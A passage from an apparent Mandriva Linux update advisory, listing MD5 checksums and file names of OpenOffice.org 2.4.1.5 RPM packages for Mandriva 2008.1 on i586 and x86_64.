2008.1/i586/openoffice.org-l10n-hu-2.4.1.5-2.3mdv2008.1.i586.rpm 7ea19669a90368fd5317f5f307e808c4 2008.1/i586/openoffice.org-l10n-it-2.4.1.5-2.3mdv2008.1.i586.rpm aae1c71fcf7551969810f641c3947daa 2008.1/i586/openoffice.org-l10n-ja-2.4.1.5-2.3mdv2008.1.i586.rpm d5c22c443d69d541cc53bd52b2caf313 2008.1/i586/openoffice.org-l10n-ko-2.4.1.5-2.3mdv2008.1.i586.rpm 20ee1019a10a6b9f7f4f6c98862c7397 2008.1/i586/openoffice.org-l10n-mk-2.4.1.5-2.3mdv2008.1.i586.rpm 4d13fb16ffc170fc39f593f300789644 2008.1/i586/openoffice.org-l10n-nb-2.4.1.5-2.3mdv2008.1.i586.rpm d40c31bc38c33462307262c86921b689 2008.1/i586/openoffice.org-l10n-nl-2.4.1.5-2.3mdv2008.1.i586.rpm 5d7dae0669ba5b61a5883a19879b286c 2008.1/i586/openoffice.org-l10n-nn-2.4.1.5-2.3mdv2008.1.i586.rpm 14d559efc736dde7105455d93713792a 2008.1/i586/openoffice.org-l10n-pl-2.4.1.5-2.3mdv2008.1.i586.rpm cabf37e0ae7d576abde1b21665e617ad 2008.1/i586/openoffice.org-l10n-pt-2.4.1.5-2.3mdv2008.1.i586.rpm 8a33cf0d3d77290c469b63edcc144791 2008.1/i586/openoffice.org-l10n-pt_BR-2.4.1.5-2.3mdv2008.1.i586.rpm 5464a8aaa0bc384318beb6c5e6401677 2008.1/i586/openoffice.org-l10n-ru-2.4.1.5-2.3mdv2008.1.i586.rpm e1011d6b124486bbf3de220ff33ca78b 2008.1/i586/openoffice.org-l10n-sk-2.4.1.5-2.3mdv2008.1.i586.rpm c3a94997d265cd8114aa8085acc8df56 2008.1/i586/openoffice.org-l10n-sl-2.4.1.5-2.3mdv2008.1.i586.rpm 83f30b9f237f310e39d8cb4ae3721fd7 2008.1/i586/openoffice.org-l10n-sv-2.4.1.5-2.3mdv2008.1.i586.rpm 724c537c220474e1658d1794b16b0b38 2008.1/i586/openoffice.org-l10n-ta-2.4.1.5-2.3mdv2008.1.i586.rpm ac041479d6d1398bad2bd16b32dac0d4 2008.1/i586/openoffice.org-l10n-tr-2.4.1.5-2.3mdv2008.1.i586.rpm ab24a1c5d24cef541e713ee3cb9bb135 2008.1/i586/openoffice.org-l10n-zh_CN-2.4.1.5-2.3mdv2008.1.i586.rpm 5945fb57d61d0f7154cfc8ed5e3a6034 2008.1/i586/openoffice.org-l10n-zh_TW-2.4.1.5-2.3mdv2008.1.i586.rpm a6ad4cf7f8e33d99482fc950ea4003c6 2008.1/i586/openoffice.org-l10n-zu-2.4.1.5-2.3mdv2008.1.i586.rpm 7c60098ed54059d166a9aa3fe82ab9e6 2008.1/i586/openoffice.org-math-2.4.1.5-2.3mdv2008.1.i586.rpm 82d7094238fbaa008cd974a0f17b5c29 2008.1/i586/openoffice.org-mono-2.4.1.5-2.3mdv2008.1.i586.rpm acf7b1901b5402b773ec0493359dc17d 2008.1/i586/openoffice.org-openclipart-2.4.1.5-2.3mdv2008.1.i586.rpm 1effa32c97588b31b96f82c9f40f027c 2008.1/i586/openoffice.org-pyuno-2.4.1.5-2.3mdv2008.1.i586.rpm 0aba3ca77aeed8ee94d5fc7a598f5119 2008.1/i586/openoffice.org-style-andromeda-2.4.1.5-2.3mdv2008.1.i586.rpm 48ee3fbcfd14c17151e8d034dd0f514a 2008.1/i586/openoffice.org-style-crystal-2.4.1.5-2.3mdv2008.1.i586.rpm 5937a004e2fabb9b71b9b6a6acc9c9f7 2008.1/i586/openoffice.org-style-hicontrast-2.4.1.5-2.3mdv2008.1.i586.rpm 6843e7b06d359ae4723081409979e5d4 2008.1/i586/openoffice.org-style-industrial-2.4.1.5-2.3mdv2008.1.i586.rpm 04938ee508062ece23c64ec02e515426 2008.1/i586/openoffice.org-style-tango-2.4.1.5-2.3mdv2008.1.i586.rpm 1d0f17c54a8b5fa95c19e053653c3ba2 2008.1/i586/openoffice.org-testtool-2.4.1.5-2.3mdv2008.1.i586.rpm 6ddff9165a16366abfe791220b371906 2008.1/i586/openoffice.org-writer-2.4.1.5-2.3mdv2008.1.i586.rpm fb0e67d3a7973657639f38353683d4e5 2008.1/SRPMS/openoffice.org-2.4.1.5-2.3mdv2008.1.src.rpm 808f4222d4e8d7547a93488ad1e6d251 2008.1/SRPMS/openoffice.org64-2.4.1.5-2.3mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: adffaafed6754cdc7e562b868c6ce3d8 2008.1/x86_64/openoffice.org64-2.4.1.5-2.3mdv2008.1.x86_64.rpm 70e21cebf1ea1724df0e7cae505ede2e 2008.1/x86_64/openoffice.org64-base-2.4.1.5-2.3mdv2008.1.x86_64.rpm 45c76c5b6726e851f9432fbaea8c2fc3 2008.1/x86_64/openoffice.org64-calc-2.